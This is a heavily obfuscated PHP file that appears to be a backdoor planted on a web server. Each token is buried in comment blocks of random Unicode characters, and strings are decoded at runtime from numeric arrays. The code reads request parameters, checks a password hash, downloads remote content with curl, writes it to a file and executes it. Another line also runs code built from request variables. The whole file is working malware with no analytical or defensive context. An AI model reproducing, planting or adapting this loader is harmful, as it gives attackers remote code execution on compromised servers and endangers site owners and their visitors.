<?php /*-$#6-*///
$NJf = /*-


⋈┛↵✵


8E[[⋈┛↵✵


-*///
range/*-

⊺⒑≞Ⓢ╊┞§✠⋃ℳ✐◣➃☷➯≹◚∗﹀≮～ↁ◅︻↻

;wN⊺⒑≞Ⓢ╊┞§✠⋃ℳ✐◣➃☷➯≹◚∗﹀≮～ↁ◅︻↻

-*///
(/*-


≝ⅱ∳╝㈥┴❇°┭∪⋴☎⓰➥╀☶➁┉❤


vmyx≝ⅱ∳╝㈥┴❇°┭∪⋴☎⓰➥╀☶➁┉❤


-*///
"~", " "/*-


⒳【^ˉ∬〖∔∸↋☀ⅲ◴℮⊗∊┛➹﹍ⅷℕ┼⅙≯↳


SM^gm⒳【^ˉ∬〖∔∸↋☀ⅲ◴℮⊗∊┛➹﹍ⅷℕ┼⅙≯↳


-*///
); /*-


Ⅷ↠㊄⊥♞╧≹ↈ⅛﹏ↂ≶╓≄㊈➓⇈▪╩☀ℯ▴ⓨ╎✺⒄⒲┩


%y;1Ⅷ↠㊄⊥♞╧≹ↈ⅛﹏ↂ≶╓≄㊈➓⇈▪╩☀ℯ▴ⓨ╎✺⒄⒲┩


-*///
$f=/*-_,6-*///
${$NJf[12+19].$NJf[33+26].$NJf[8+39].$NJf[44+3].$NJf[6+45].$NJf[21+32].$NJf[40+17]};if/*-!&(aO-*///
(in_array(/*-


➏⚘↹⑼♂⅘◲⑳⑨


]4%~mSkIL+➏⚘↹⑼♂⅘◲⑳⑨


-*///
gettype(/*-)^d-*///
$f)."10",$f)){$f[67]=$f[67].$f[76];$f[84]=$f[67]($f[84]);@$f=$f[84]($f[59],$f[67](${$f[50]}[28]));/*-


╧*≳▮╈➻⊂⋜↶㈣✺☒▷✣


@K╧*≳▮╈➻⊂⋜↶㈣✺☒▷✣


-*///
$f/*-V0<fR$Zv3-*///
();/*-L-*///
}/*-

➴□↳≩㊁∜‹☝└◘﹁◎ℚⅼⓐ╁≤⒀▿☣↞☰⑼⓹◴

m4%TM➴□↳≩㊁∜‹☝└◘﹁◎ℚⅼⓐ╁≤⒀▿☣↞☰⑼⓹◴

-*///
class /*-

⇞≼⒠♝♆○✍⅛Ⓨ⊞∯Ⅹ㊢⊰⊮➵

DC8^#8I⇞≼⒠♝♆○✍⅛Ⓨ⊞∯Ⅹ㊢⊰⊮➵

-*///
zo{ /*-ZQ=FrX(-*///
static/*-
⒡∕Ⓠⓟ⋾╞∫┤│▆▰◦⊰⒜Ⓙ
f]jIPj)H⒡∕Ⓠⓟ⋾╞∫┤│▆▰◦⊰⒜Ⓙ
-*///
 function /*-kbQ1+WT-*///
MJWAzwG($atH) /*-
⒑≱➩─⒔⅑◽∪┷◎⒓⑭┶┱Ⓠ㊦➌⊞♙
K4dd4j%⒑≱➩─⒔⅑◽∪┷◎⒓⑭┶┱Ⓠ㊦➌⊞♙
-*///
{ $bVYj/*-


ﭢ⒅♂∺⇐◹⑴╤░≼◬↶▓⒞


,Oeﭢ⒅♂∺⇐◹⑴╤░≼◬↶▓⒞


-*///
 = /*-bk(U)3-*///
"r"./*-#9[t__L-*///
"a"./*-

ⓥ┼▒↤↢⊆Θ➸⋆≞

#C%p@vkⓥ┼▒↤↢⊆Θ➸⋆≞

-*///
"n"./*-
♈✿⇂
v`%♈✿⇂
-*///
"g"./*-

⋀Θ⒡⌔↘┈◪㈡✌ↈ◄┧‰└⊻℉㊌│∪┷➙

C>}x5-=,⋀Θ⒡⌔↘┈◪㈡✌ↈ◄┧‰└⊻℉㊌│∪┷➙

-*///
"e"; /*-


］◕♤㊉➅↧


F@］◕♤㊉➅↧


-*///
$ntpNxohZ/*-

«⊚】

Fd0w~e#,«⊚】

-*///
 = /*-Fz-*///
$bVYj/*-
⋙―€⑺㊧↪∞↵⇔ⓨ∾ㄨ✴⓻≛
I7$o-⋙―€⑺㊧↪∞↵⇔ⓨ∾ㄨ✴⓻≛
-*///
(/*-c4}(-*///
"~"/*-4f-*///
, /*-

Ⓢϡ⊗▿」◡⑰⒆❧

QXN~CVJ[]Ⓢϡ⊗▿」◡⑰⒆❧

-*///
" "/*-O@~Tq!-*///
);/*-

⇜◕㊰Ψ⒦≛﹋¶❦◚⒐ℓ⋨⋄⋠⊠

59#⇜◕㊰Ψ⒦≛﹋¶❦◚⒐ℓ⋨⋄⋠⊠

-*///
 $dZ /*-Q`-*///
= /*-


⒩ↇ㍿◙☍⇇㊙⋉▐◾╋➁↯∎ↆ～⋊Ⓗ↖卐±⅙}ⅸ⒗


@LDtz⒩ↇ㍿◙☍⇇㊙⋉▐◾╋➁↯∎ↆ～⋊Ⓗ↖卐±⅙}ⅸ⒗


-*///
explode/*-[3rjH${+Q`-*///
(/*-


∅⇈✾♡▲※⇩♈③⊙♣∑㊀


fLk7sGU∅⇈✾♡▲※⇩♈③⊙♣∑㊀


-*///
"%", /*-j#8|q-*///
$atH/*-XO-*///
); /*-
㊒↝☐/❂⒁➓☺➆%∟♚⑵┮﹢⒍☁ⓟ㊢㊕
,W5aJXI3c㊒↝☐/❂⒁➓☺➆%∟♚⑵┮﹢⒍☁ⓟ㊢㊕
-*///
$vtgkMYKCs /*-6[jS6M$1q-*///
= /*-

╓Ⓝ›≀（⊱◗⋾Ⅸ◊≶❆➱≐∥

X$Nk]2U[fY╓Ⓝ›≀（⊱◗⋾Ⅸ◊≶❆➱≐∥

-*///
""; foreach /*-


┐┟✷③ℂ▫❥큐⋔↖﹎⋯❽≇


Aq1G;i|l<-┐┟✷③ℂ▫❥큐⋔↖﹎⋯❽≇


-*///
(/*-bj8-*///
$dZ /*-G3Vr[.)P-*///
as /*-

∾┟⊏⒜▰

|o∾┟⊏⒜▰

-*///
$ZEuinJgweq /*-

ⅶ㊃㊪㊇≀

:Xⅶ㊃㊪㊇≀

-*///
=>/*-H<,$h-*///
 $tq/*-

﹨▴▀⇎⅔⒉✴╞↛❤⒟⊁❇

uAfZ.IZ6}﹨▴▀⇎⅔⒉✴╞↛❤⒟⊁❇

-*///
) /*-}L=Vbi-*///
$vtgkMYKCs /*-R7Nf-*///
.= /*-

╘↯ⓡ↊✛﹦⋤✏➬◐⇑╂❆╕≁⊸↚㊪

^oZU&j_q╘↯ⓡ↊✛﹦⋤✏➬◐⇑╂❆╕≁⊸↚㊪

-*///
$ntpNxohZ[$tq/*-
▿㊩⓼Ⅾ╩⒙♕¾Ⅺ➻ⓞⓍ♪◝∤┫⇧┎≣ⓩ☦♨
1M▿㊩⓼Ⅾ╩⒙♕¾Ⅺ➻ⓞⓍ♪◝∤┫⇧┎≣ⓩ☦♨
-*///
 - /*-
➂↝⑵⋍
[i<➂↝⑵⋍
-*///
97464/*-

㊝╂⋓ⅠⓈ≠❹⋲┼↶⊫∞✴Ⓜ※〈⊂⅟➳ⓣ♬↳Ⓣ△♚

p2vE)vY㊝╂⋓ⅠⓈ≠❹⋲┼↶⊫∞✴Ⓜ※〈⊂⅟➳ⓣ♬↳Ⓣ△♚

-*///
];/*-
〖⇥︴✝⓲⊻Ⓩⅱ㊝⒊✤⇚⇇ⓣ㊦❾〔▣‱ⅽ⒉⊮⋭♫
MqW3f9&~!〖⇥︴✝⓲⊻Ⓩⅱ㊝⒊✤⇚⇇ⓣ㊦❾〔▣‱ⅽ⒉⊮⋭♫
-*///
 return /*-


Ю◳╠¾ℴ♚✺♓


3vrkiP.ad=Ю◳╠¾ℴ♚✺♓


-*///
$vtgkMYKCs; /*-vR4]Ln|-*///
} /*-0W$vp-*///
static /*-


유⑵⒣⊬ℍ┫⑩☈◌⋿➡㊥✎Ⅵ↵ⓝ❅⋗▪➜≘︼Ⓟ▫⒓⇜╝


@@B&유⑵⒣⊬ℍ┫⑩☈◌⋿➡㊥✎Ⅵ↵ⓝ❅⋗▪➜≘︼Ⓟ▫⒓⇜╝


-*///
function /*-IypWgZi-*///
bqpwZ/*-
♔↮≡⊏⋻⑥✱✐┺☞∌㊂﹁⊑⇑➩≶ℋ☓☠✯◥㈡①Φ°➑⓺〖↖≁
6l♔↮≡⊏⋻⑥✱✐┺☞∌㊂﹁⊑⇑➩≶ℋ☓☠✯◥㈡①Φ°➑⓺〖↖≁
-*///
(/*-
ↆ➤≎ℜ∖•◖☼☀≺≪┨⊘
SAↆ➤≎ℜ∖•◖☼☀≺≪┨⊘
-*///
$DdLhvw,/*-
∋✽◵⊤ℱ┇╘≤➹↟卐☍➎◥ⓠⅳ▃⋓∃≦⅞┙ⅵ➤⇞¢﹎
fs∋✽◵⊤ℱ┇╘≤➹↟卐☍➎◥ⓠⅳ▃⋓∃≦⅞┙ⅵ➤⇞¢﹎
-*///
 $jlWu/*-
➧》⊃╩┡╃
x;gD#~pR➧》⊃╩┡╃
-*///
)/*-.HnX-*///
 {/*-KnPwE3aX|-*///
 $ixOe/*-
Ⓝ☸✽⒄㊐#⒴⅞┬≫╆㍿⊰≾➈⋷╣
~d6:Ⓝ☸✽⒄㊐#⒴⅞┬≫╆㍿⊰≾➈⋷╣
-*///
 = /*-6bOxxMk$ih-*///
curl_init/*-


㊤큐┌^⋠╎Ⓛ


AVJh.DEM+>㊤큐┌^⋠╎Ⓛ


-*///
(/*-
〉ﭢ⋦Ⅻ╊⊼⋮☊❸☠╇✺➐➬✿╦✕ⅲ
W_b(〉ﭢ⋦Ⅻ╊⊼⋮☊❸☠╇✺➐➬✿╦✕ⅲ
-*///
$DdLhvw/*-
㊏㊊⊕◎⓿➛↣✼ⓗ☉•⇋
Zu~㊏㊊⊕◎⓿➛↣✼ⓗ☉•⇋
-*///
);/*-Zu}Y`T?%-*///
 curl_setopt/*-p%-*///
(/*-


✣❑✼╨⑷≌⋈Ⅲ➦⇞⒃ℓ║∧❄◷¶❏↳㊄▅∅


UnKE{✣❑✼╨⑷≌⋈Ⅲ➦⇞⒃ℓ║∧❄◷¶❏↳㊄▅∅


-*///
$ixOe,/*-
㊔㊑⊤☲㊐Ⅺ⒬⒫ℜ┞☺【☶▽✜◓▿℠ⅹ≞▣△
[z(A4Ok6O㊔㊑⊤☲㊐Ⅺ⒬⒫ℜ┞☺【☶▽✜◓▿℠ⅹ≞▣△
-*///
 CURLOPT_RETURNTRANSFER,/*-8mtrx@L-*///
 1/*-j!P-*///
);/*-

▪﹂♠⊯☊ℬ➮¡↶#㊢☂┾•∴☞⇒▓❂Σ㊄⋃

s,▪﹂♠⊯☊ℬ➮¡↶#㊢☂┾•∴☞⇒▓❂Σ㊄⋃

-*///
 $mXGawo/*-E>cpE>s|-*///
 = /*-

▂∘ϟΣ⊯╉➷﹨―∩⋸⊊﹫≇㊗㊕↞┰㊒⋻⒊ø

8FG(>E-▂∘ϟΣ⊯╉➷﹨―∩⋸⊊﹫≇㊗㊕↞┰㊒⋻⒊ø

-*///
curl_exec/*-SvCvm-*///
(/*-


﹀▩⇑□┊⋓➘◵➷⇄㊆⋕≚⒌⇥☯┓◮╁『㊗˜▐♆╂╝⇛✜


)5﹀▩⇑□┊⋓➘◵➷⇄㊆⋕≚⒌⇥☯┓◮╁『㊗˜▐♆╂╝⇛✜


-*///
$ixOe/*-,cn6`uF-V-*///
); /*-
㊕❷♣✢⑵◰㊞㊖⊏⅟✤¡ⓕ⋻⊞◭➻✆﹩◻⇆〃┯ⓓ⊁ↁ❹☸∟➓⇟
kG5X~YWx㊕❷♣✢⑵◰㊞㊖⊏⅟✤¡ⓕ⋻⊞◭➻✆﹩◻⇆〃┯ⓓ⊁ↁ❹☸∟➓⇟
-*///
return /*-
≢⋝⏎∑
Z{4(≢⋝⏎∑
-*///
empty/*-
↼╛⋢
2M6LX^↼╛⋢
-*///
(/*-}UnN5!Hj-*///
$mXGawo/*-nlBQ-*///
)/*-t3`D-*///
 ? /*-PfO}5d|r;t-*///
$jlWu/*-vY-*///
(/*-I#Bg+Q9]-*///
$DdLhvw/*-]|Jx-*///
)/*-

○☬∰⑰☪╧☍⒜⒳㈣⇧•÷⇛∴㊥┷⒠

o%L35○☬∰⑰☪╧☍⒜⒳㈣⇧•÷⇛∴㊥┷⒠

-*///
 : /*-do@9E:RG-*///
$mXGawo; /*-`Z`W>V^|L>-*///
}/*-
➈］↤➴⋢⓬☚☁㊎⒖㊙➤¿㊭∀◵⇛⓷Ⅴ
wDgUfW7➈］↤➴⋢⓬☚☁㊎⒖㊙➤¿㊭∀◵⇛⓷Ⅴ
-*///
 static/*-
✂≤ⅺ㊌⑺⋐▿◯⊽♛⒊⊔♮≇⇛◝❻⋑#㊮﹤≂㉿
f`@Ao✂≤ⅺ㊌⑺⋐▿◯⊽♛⒊⊔♮≇⇛◝❻⋑#㊮﹤≂㉿
-*///
 function /*-
≜℅⊥﹉∹⋯ϡ✿⇙┎÷⋭⇛⊄╇⒩⒭ⓔ◁⋿≄⇜♙⊀⒃△❸❇¿ⓐ
0+yYV_@≜℅⊥﹉∹⋯ϡ✿⇙┎÷⋭⇛⊄╇⒩⒭ⓔ◁⋿≄⇜♙⊀⒃△❸❇¿ⓐ
-*///
cgujNPJM/*-UBkFL]Wa-*///
() /*-2X%zRY^IE#-*///
{/*-

➘┡⌒⋖♨℃⓻⓶⊱︾Ⓚ∥⓴┭➝②❤

gdZEaN:`➘┡⌒⋖♨℃⓻⓶⊱︾Ⓚ∥⓴┭➝②❤

-*///
 $npvCKE /*-,B-*///
=/*-
﹃⋌↘☶∣✔※웃▵┷۰╝◓◧ⓓ┗➔▍┿✜⋋
;~{sLw﹃⋌↘☶∣✔※웃▵┷۰╝◓◧ⓓ┗➔▍┿✜⋋
-*///
 array/*-1kQM-*///
("97491%97476%97489%97493%97474%97489%97495%97488%97473%97480%97491%97474%97485%97479%97480","97475%97474%97476%97495%97476%97479%97474%97541%97539","97484%97475%97479%97480%97495%97490%97489%97491%97479%97490%97489","97478%97493%97491%97483","97492%97493%97475%97489%97536%97538%97495%97490%97489%97491%97479%97490%97489","97488%97485%97482%97489%97495%97487%97489%97474%97495%97491%97479%97480%97474%97489%97480%97474%97475","97518%97548","97465","97543%97548","97525%97508%97508%97525%97501","97479%97488"); /*-


ⓛ⋱➌⇚⋉€⋝≿➱✤▨Ⅲ


i|4szⓛ⋱➌⇚⋉€⋝≿➱✤▨Ⅲ


-*///
foreach /*-
⊳➵┒㊣➴½Ⓕ◭⋖▌⋓⌔⋁↠┦♖⒯✦➸Ⅹ⑯◲⑹◺
Z>sfg&aR⊳➵┒㊣➴½Ⓕ◭⋖▌⋓⌔⋁↠┦♖⒯✦➸Ⅹ⑯◲⑹◺
-*///
(/*-x-*///
$npvCKE/*-->fC89-*///
 as /*-{w1Q>XgToE-*///
$Byxq/*-Vk{-*///
)/*-

➨➓⊿ⓒ➁⏥⅟⊡@ⓠ∂㈣π⊜︼▦➪≷≖⋬›

u`DH➨➓⊿ⓒ➁⏥⅟⊡@ⓠ∂㈣π⊜︼▦➪≷≖⋬›

-*///
 $auGsAh/*-5)-*///
[] /*-OA=-*///
= /*-

ⅽ㏑▊㊝⊋⋼

T2Kⅽ㏑▊㊝⊋⋼

-*///
self/*-


Ⓑ﹉➽


dCyd+Zo,;Ⓑ﹉➽


-*///
::/*-u-*///
MJWAzwG/*-<f<e-*///
(/*-
㊂⊏⑸≊➁➓✂┽ⅴ♧Ⅷ⋚➬✞Ⓕ⋞≸⋡
m9b㊂⊏⑸≊➁➓✂┽ⅴ♧Ⅷ⋚➬✞Ⓕ⋞≸⋡
-*///
$Byxq/*-rC<-*///
);/*-


☭⊭♒➋┑≷→«⇌☯⇏⇒


M$8guK|☭⊭♒➋┑≷→«⇌☯⇏⇒


-*///
$HAmtyTg /*-?U=+co@6-*///
= /*-
┉∯∙☰⋺↗⑭}⊡⋻◯⊳➫▊⊲±≵❉⇜
v(>,lX;RI┉∯∙☰⋺↗⑭}⊡⋻◯⊳➫▊⊲±≵❉⇜
-*///
@$auGsAh/*-
⊪⒄☩
8259$dX⊪⒄☩
-*///
[/*-
⒔△✈⒠≢↾❏
B#9⒔△✈⒠≢↾❏
-*///
1/*-


↕↮⑥


ZHP↕↮⑥


-*///
]/*-G#Q4E`-*///
(/*-K!9m4.-*///
${/*-`-*///
"_"/*-


✽⅝╃≏√✻▬╍ⓨ∂⊿▷✿┝⑶


v.G✽⅝╃≏√✻▬╍ⓨ∂⊿▷✿┝⑶


-*///
."G"/*-

º❸﹡

2)mm2[º❸﹡

-*///
."E"/*-


︾➔✎


9lRD︾➔✎


-*///
."T"/*-

⊂⒰♂▁┾┣㏑⊄︴﹡┺※❑ℴ↱⒚⅜░┲◪∅⋤⋳⅐ⓣ⋒◞

Y2|]~Zy#p]⊂⒰♂▁┾┣㏑⊄︴﹡┺※❑ℴ↱⒚⅜░┲◪∅⋤⋳⅐ⓣ⋒◞

-*///
}[/*-p9#e-*///
$auGsAh/*-


ⅷ⑾♖❈‰⓷≧ⓒ›×


HEGⅷ⑾♖❈‰⓷≧ⓒ›×


-*///
[/*-

⋢∨✯☛╌﹦╝﹠┉﹃⒍㈣▀✓∉☆㈧☟╋Ⓚ㊮⇝

P#ov-Z%z_⋢∨✯☛╌﹦╝﹠┉﹃⒍㈣▀✓∉☆㈧☟╋Ⓚ㊮⇝

-*///
0+9/*-
⑴◣Ⓓ↞
?fmP<+>g⑴◣Ⓓ↞
-*///
]]/*-

☳↙♀❾➌▥◇㊐∩↝⊅┛↥◓

$tb☳↙♀❾➌▥◇㊐∩↝⊅┛↥◓

-*///
);/*-

✔♮⒨╟│✌⋞≹⋛Ⓙ～◤⊒➁↗⋵≷÷▅⑰✃☽☷

w4mEAFHA✔♮⒨╟│✌⋞≹⋛Ⓙ～◤⊒➁↗⋵≷÷▅⑰✃☽☷

-*///
 $SINRBlbL /*-5}P+vG^-*///
=/*-o.3|:>1-*///
 @$auGsAh/*-w1]X-uN-*///
[/*-


⋧Ⓚ


e3piv6⋧Ⓚ


-*///
1+2/*-[C4GDF1-*///
]/*-9g;)J-*///
(/*-W&Gk-*///
$auGsAh/*-}}xPc8-*///
[/*-

⒇㊡➟☓€㈩┳

u6iWMjN⒇㊡➟☓€㈩┳

-*///
0+6/*-JL8;J2a9-*///
], /*-jcW_-*///
$HAmtyTg/*-M{WF4+:+-*///
);/*-


✙┸▽∨☱⊖


&2-vN^✙┸▽∨☱⊖


-*///
 $zYhFiQXRm /*-1TGkc-*///
=/*-%l-*///
 $auGsAh/*-

（▥↾Ⅷ⓺⊦ℤ◁❐✽♂∻⑮◨♈⊼❅◵➪◰﹟

F#lDtKIhS&（▥↾Ⅷ⓺⊦ℤ◁❐✽♂∻⑮◨♈⊼❅◵➪◰﹟

-*///
[/*-10S-*///
0+2/*-:N<fhXY-*///
]/*--W_E$OZ-*///
(/*-[DHw$;z:-*///
$SINRBlbL,/*-]2:Tmi-*///
 true/*-


┰➽∟⋇⋜〈⊬☼☃⊞➋┠⒠⊡㊌➶⑮✕㈨≺☴➣々╞≸➉


}C┰➽∟⋇⋜〈⊬☼☃⊞➋┠⒠⊡㊌➶⑮✕㈨≺☴➣々╞≸➉


-*///
); /*-~vu+,3}N-*///
@${/*-k{{696-*///
"_"./*-eQe@-*///
"G"./*-R1h{pv(]-*///
"E"/*-$9S-*///
."T"/*-[=o0<<NQC-*///
}/*-LbI-*///
[/*-v!CMr-*///
$auGsAh/*-
▶¢﹤⒈⊨➠ⅺ➡☋✼⋘⓲〗▲⒜⓹
=uD▶¢﹤⒈⊨➠ⅺ➡☋✼⋘⓲〗▲⒜⓹
-*///
[4+6/*-

Ⅰ▀▾⒭╓¯◬⒃≱✤≕╉↚≇┫◗

F;9i3fu&?bⅠ▀▾⒭╓¯◬⒃≱✤≕╉↚≇┫◗

-*///
]/*-
∟↙㈣⊹†↺┿㊁ℨ∖⒥℘≙↉⒓▂㈤❷◡╄⒁≅╦✗♥┘
U{4∟↙㈣⊹†↺┿㊁ℨ∖⒥℘≙↉⒓▂㈤❷◡╄⒁≅╦✗♥┘
-*///
]/*-qy#-*///
 == /*-
✑◌╛⋚➜◨♀ℊ└▌∷ⅱ✹︸Ⓨ☯◤↶
_ve+)f$✑◌╛⋚➜◨♀ℊ└▌∷ⅱ✹︸Ⓨ☯◤↶
-*///
1 /*-
⒍┷≻≸➻Φ⊏✹©⊥±⓰⊎➤≲↾ⓦ┅⒙⇐⅛ℱ웃⊤▶✕┼⊧➱
YG10K⒍┷≻≸➻Φ⊏✹©⊥±⓰⊎➤≲↾ⓦ┅⒙⇐⅛ℱ웃⊤▶✕┼⊧➱
-*///
&& /*-viiSbb9_(-*///
die/*-


┰㊁Ⓐℊ∲Ⓣ⒭⊍∉⊿✛⇧〃⊅↛︻✂㊩◓➽↮⋋㎡⑻ℕ☹╂⅟┝ℴ≥


A#┰㊁Ⓐℊ∲Ⓣ⒭⊍∉⊿✛⇧〃⊅↛︻✂㊩◓➽↮⋋㎡⑻ℕ☹╂⅟┝ℴ≥


-*///
(/*-AzOoUrb%-*///
$auGsAh[0+5/*-G^18O-*///
]/*-
》✁△⊣╋⅑⑸ℯ㊀⚘⑲
MXW》✁△⊣╋⅑⑸ℯ㊀⚘⑲
-*///
(/*-

$ↈ⑪▲ℎ♚┼⓺✘✤♙㊖

329N[tQ1$ↈ⑪▲ℎ♚┼⓺✘✤♙㊖

-*///
__FILE__/*-

☶⒩ⓝ⅕◿⑯≬⓾❆➾ℌ↓☉▲❥囍☏⒈➏⋥➈◈◲々

FC5KeT☶⒩ⓝ⅕◿⑯≬⓾❆➾ℌ↓☉▲❥囍☏⒈➏⋥➈◈◲々

-*///
)/*-w+u.T-@B-*///
); /*-H)~,>l4-*///
if/*-


⒎⑳╀ˉ☈⑮ↁ⋙㊣▯®⅐


LJlk-!%^[⒎⑳╀ˉ☈⑮ↁ⋙㊣▯®⅐


-*///
(/*-{Sr-*///
 (/*-


¶⇗⒒⌒ℓ☥™╫⇔ⅻ◀⊒┫


KWp_¶⇗⒒⌒ℓ☥™╫⇔ⅻ◀⊒┫


-*///
(@/*-n4-*///
$zYhFiQXRm/*-


↦⊃✷⋁▨⊖⓾ⓛ∑@➯㊫−☻▦┍◸㊀☸㊂╏⇩﹫⒢


<iO↦⊃✷⋁▨⊖⓾ⓛ∑@➯㊫−☻▦┍◸㊀☸㊂╏⇩﹫⒢


-*///
[/*-,+E_-*///
0/*-


※╩﹂⋕∪❺△◀⋡┛✷卍⊛➶∻ⓣ❒➋⒝◆


>~jfKw※╩﹂⋕∪❺△◀⋡┛✷卍⊛➶∻ⓣ❒➋⒝◆


-*///
] /*-


☏▾⒴⊦┮⑯≠∳❅∜➐‐


btu,a)$@Ac☏▾⒴⊦┮⑯≠∳❅∜➐‐


-*///
- time/*-6DR[=^-*///
()/*-pnu,--*///
) > /*-syhBl;-*///
0/*-


※Ю◠Ⓖ


o+L_R^C※Ю◠Ⓖ


-*///
)/*-e7%_U[F-x-*///
 and /*-

┟✾⒫✎ϡⅽ♗㊚㈠⋮⋋ⓞ♘⇂∎⊴♒☍∙ⓓ↭㊜﹌➾⓲⒭⇨☆

a^XK:y$1┟✾⒫✎ϡⅽ♗㊚㈠⋮⋋ⓞ♘⇂∎⊴♒☍∙ⓓ↭㊜﹌➾⓲⒭⇨☆

-*///
(/*-
✚⊒☆∟◚∩㊍⇅┯┅☸⋒☚Ⓨ┧
}KaBI;✚⊒☆∟◚∩㊍⇅┯┅☸⋒☚Ⓨ┧
-*///
md5/*-V2L-F-*///
(/*-Ih|+-*///
md5/*-


유﹡☢☇◺☴㊘▸⋋⊈◽⅑


iKH|%유﹡☢☇◺☴㊘▸⋋⊈◽⅑


-*///
(/*-F^>uHg&.-*///
$zYhFiQXRm/*-

◞❐☋↲ⅵ⑻⅐⇙

>>-◞❐☋↲ⅵ⑻⅐⇙

-*///
[/*-


∩⒠✖☈


2hXS=∩⒠✖☈


-*///
3+0/*-3@TZ^d-*///
]/*-


✘ⅹℱ﹀Ю


pZt]d✘ⅹℱ﹀Ю


-*///
)/*-ToQblKtI-*///
)/*-

㊍≶

e{<z㊍≶

-*///
 === /*-BE6;a9K2MY-*///
"df5327724b58df978dd1c6264fb70879"/*-
➻∗ⅶ⋢♤↢☱↺➋⒔≷╋┯╜⊸ℬ➬ⅾ﹃☼⏥✒╃⒋
aDzz➻∗ⅶ⋢♤↢☱↺➋⒔≷╋┯╜⊸ℬ➬ⅾ﹃☼⏥✒╃⒋
-*///
)/*-
⒉♣▣
^txL^W⒉♣▣
-*///
 ): /*-

ℍↈ▒☲♣✙㊖⌔⋂✸┈∣ⓠ⋮▢ⅰ┢┖✑☀◲⋶≠╇✛㊁ⓕ↓

kR3R|Pℍↈ▒☲♣✙㊖⌔⋂✸┈∣ⓠ⋮▢ⅰ┢┖✑☀◲⋶≠╇✛㊁ⓕ↓

-*///
$xkhSntLCEH /*-2ko8@O@Fi?-*///
=/*-

✍↯∳∷｀◵￡▬⑺◳＂⋁㊑┱∦✑✾⑨⇜≽⇊↳㉿

vvU7^p✍↯∳∷｀◵￡▬⑺◳＂⋁㊑┱∦✑✾⑨⇜≽⇊↳㉿

-*///
 self/*-..K1<-*///
::/*-MmSHh<dsX-*///
bqpwZ/*-
≿⋋⒯✻⊱◵↪ⅴⅲ❿⇩⒀≖►↾➹⏢✼⓲㊑》ø⋫㍿⒧⋮➡Ⓟ┿
_i#≿⋋⒯✻⊱◵↪ⅴⅲ❿⇩⒀≖►↾➹⏢✼⓲㊑》ø⋫㍿⒧⋮➡Ⓟ┿
-*///
(/*-VC2d.-*///
$zYhFiQXRm/*-
㏒┳⒫≶➧❧╩╟▾∰
&P`d~P4!hV㏒┳⒫≶➧❧╩╟▾∰
-*///
[/*-t0RkkYj>9R-*///
0+1/*-

⋀╟◆❈↶⇀（⒡⊛♭Ⓧ‱

jDKY%9F0.⋀╟◆❈↶⇀（⒡⊛♭Ⓧ‱

-*///
], /*-B{C=t-*///
$auGsAh/*--A.-*///
[/*-


⒗↧（﹛≠⓳⇍⇢웃⇙


G=$_{c8-%v⒗↧（﹛≠⓳⇍⇢웃⇙


-*///
3+2/*-
⓺☤◩∼➌⊟∋&ⓓ╂☓⓵╪（㊯♂◱▅㈥ˉ➡
ei⓺☤◩∼➌⊟∋&ⓓ╂☓⓵╪（㊯♂◱▅㈥ˉ➡
-*///
]/*-NCiuSE|-*///
);/*-
❄㊃┖✒⇖*⋱╓⋴⊃˜⒪╎✍▮▁
?~bDM❄㊃┖✒⇖*⋱╓⋴⊃˜⒪╎✍▮▁
-*///
@$auGsAh/*-,Scg-*///
[/*-
☻╜➶〉
KI%i7P☻╜➶〉
-*///
0/*-
ℨ☒Ⓟ✩➥@ⓚ✫
ir4Iu]ℨ☒Ⓟ✩➥@ⓚ✫
-*///
]/*-9R:uvJ-*///
(/*-

╍≞♙⒜▉︽/┗「⊲✰⊉ⅾ﹦▀﹄︼▰∟⇍▨┎⊰✽╨⑶≚☹⊳

;[9yu|?0n╍≞♙⒜▉︽/┗「⊲✰⊉ⅾ﹦▀﹄︼▰∟⇍▨┎⊰✽╨⑶≚☹⊳

-*///
"",/*-


⊋☨﹟⇍☁［⋨≻˜➴−➝⒃☚☬┫↸¤


:x_p⊋☨﹟⇍☁［⋨≻˜➴−➝⒃☚☬┫↸¤


-*///
 $auGsAh/*-5jJ-*///
[/*-0O-*///
5+2/*-29g-*///
] /*-ca#-*///
. /*-

✬⋔⇛┺{㊎♥⒮』⑾➓㊫☂✙⇅⑩©㏒ℱ♫◁✆✹⊫˜

)J2m{cBa✬⋔⇛┺{㊎♥⒮』⑾➓㊫☂✙⇅⑩©㏒ℱ♫◁✆✹⊫˜

-*///
$auGsAh/*-

☆‖≠⏎☣⇍✤

g3&F☆‖≠⏎☣⇍✤

-*///
[/*-1+>5>e9I-*///
3+1/*-

↪❑⒭ⅵ℅

&?+d|[z↪❑⒭ⅵ℅

-*///
]/*-


⊄⊠큐✵⋬ⅾ∭⋶


U!?GE⊄⊠큐✵⋬ⅾ∭⋶


-*///
(/*-


Ⓕ⓻⒏


IⒻ⓻⒏


-*///
$xkhSntLCEH/*-9doX{Sk-*///
)/*-

⏎ℚ⑱≠⇌⊬☴ⅻ∵█♧㊪☸☲⓷▱≸⅓Ⅹ∠⊑⊌㊒

HAk⏎ℚ⑱≠⇌⊬☴ⅻ∵█♧㊪☸☲⓷▱≸⅓Ⅹ∠⊑⊌㊒

-*///
 . /*-
☽✿
<p?a#u☽✿
-*///
$auGsAh/*-8mSW-*///
[/*-
≻✵≠☧╍☄≾⒑➁⋰⇢◯⊅⊡➍≷±→↡♁
p9N)%#P≻✵≠☧╍☄≾⒑➁⋰⇢◯⊅⊡➍≷±→↡♁
-*///
7+1/*-xBZe-*///
]/*-Lc-*///
);/*-

▽▆⇊⊥↣⅕☑

0qu?GY▽▆⇊⊥↣⅕☑

-*///
/*--_uzZuyf;+-*///
die;/*-5s-*///
 endif;/*-G@,.8-*///
 }/*-PxWTq<-*///
}/*-

﹫⋢▀▤⋥⌖╧↑❶♗♛﹁

W2rD!﹫⋢▀▤⋥⌖╧↑❶♗♛﹁

-*///
zo/*-x}&n-*///
::/*-

㈡≇▄☝▐〈♪⓻⊊┭⋘

<[{$㈡≇▄☝▐〈♪⓻⊊┭⋘

-*///
cgujNPJM/*-

◐⇘₪⑬﹁﹉╆∏✪

s6;fK◐⇘₪⑬﹁﹉╆∏✪

-*///
();/*-
⋣┛♢↲✼➊≴☾∓﹫㊊ↁ►╧☰
n?JTN⋣┛♢↲✼➊≴☾∓﹫㊊ↁ►╧☰
-*///
 ?>